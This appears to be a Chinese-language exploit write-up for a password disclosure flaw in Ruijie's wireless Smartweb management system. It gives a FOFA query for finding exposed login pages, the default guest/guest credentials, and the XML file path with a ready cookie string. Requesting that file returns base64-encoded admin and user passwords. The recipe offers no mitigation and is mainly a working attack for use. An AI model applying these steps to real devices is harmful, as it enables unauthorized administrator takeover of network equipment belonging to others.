# 锐捷Smartweb管理系统 密码信息泄露漏洞

### 漏洞描述 <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

锐捷网络股份有限公司无线smartweb管理系统存在逻辑缺陷漏洞，攻击者可从漏洞获取到管理员账号密码，从而以管理员权限登录。

### 漏洞影响 <a href="#lou-dong-ying-xiang" id="lou-dong-ying-xiang"></a>

&#x20;Note

锐捷网络股份有限公司 无线smartweb管理系统

### FOFA <a href="#fofa" id="fofa"></a>

&#x20;Note

title="无线smartWeb--登录页面"

### 漏洞复现 <a href="#lou-dong-fu-xian" id="lou-dong-fu-xian"></a>

登录页面如下

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr29TNgN3F9wtPQQQU%2F-MhrW-dXIZEbB5rKTHqF%2Fimage.png?alt=media\&token=1eedbad8-67b7-4bea-8d0d-dbd6874d8480)

默认存在 guest账户，账号密码为 **guest/guest**

其中登录的过程中搜索admin的数据后发现请求了一个文件 **/web/xml/webuser-auth.xml**，而且响应中包含了 admin密码的base64加密<br>

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr29TNgN3F9wtPQQQU%2F-MhrW3BQHffhETTBvGvC%2Fimage.png?alt=media\&token=2ee534c0-1a32-4c99-8c1f-d0e1f6d794d7)

解密就可以获得 admin管理员的密码，尝试直接请求

```
http://xxx.xxx.xxx.xxx/web/xml/webuser-auth.xml

Cookie添加
Cookie: login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr29TNgN3F9wtPQQQU%2F-MhrW7qOPyeVrTKDrtWJ%2Fimage.png?alt=media\&token=bc88df36-54a2-4ab9-8cc0-12ba34d4ef16)

直接获得所有的账户的等级标志和base64加密的账号密码
